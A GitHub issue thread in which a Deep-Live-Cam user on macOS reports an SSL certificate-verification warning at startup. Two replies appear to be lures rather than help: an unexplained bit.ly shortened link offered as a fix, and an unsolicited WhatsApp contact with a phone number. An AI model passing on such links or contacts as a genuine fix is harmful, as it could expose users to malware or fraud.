### ISSUE TITLE
ERROR: CERTIFICATE_VERIFY_FAILED

### ISSUE THREAD

**Issue by mratschheitmann** [hacksider/Deep-Live-Cam#607]
Hi,
i got the following error on startup:

```
python run.py

/Users/XXX/Development/Deep-Live-Cam/myenv/lib/python3.10/site-packages/albumentations/check_version.py:49: UserWarning: Error fetching version info <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:997)>
  data = fetch_version_info()
```

after that the UI shows up but nothings works.
How to fix this??

**Comment by nhatlaso1** [comment]
try this
https://bit.ly/3XQLHlH

you may need to install the c compiler

**Comment by mratschheitmann** [comment]
Im using MacOS

**Comment by mratschheitmann** [comment]
i found something, ill try it:

Install Xcode Command Line Tools: 
Before installing any further development tools, ensure that you have Xcode's command-line tools installed. This provides compilers like clang, ranlib, and other tools necessary for building packages.

To install Xcode command line tools, run:

`xcode-select --install`

**Comment by Updatedme** [comment]
> Hi,
> i got the following error on startup:
> 
> ```
> python run.py
> 
> /Users/XXX/Development/Deep-Live-Cam/myenv/lib/python3.10/site-packages/albumentations/check_version.py:49: UserWarning: Error fetching version info <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:997)>
>   data = fetch_version_info()
> ```
> 
> 
> after that the UI shows up but nothings works.
> How to fix this??
> 
> 
> 
> 
> 
> 
> 
> 
> 
If you need further assistance, here's my whatsapp
https://wa.me/message/GXQYWX4XRTXGB1 +2347081306010
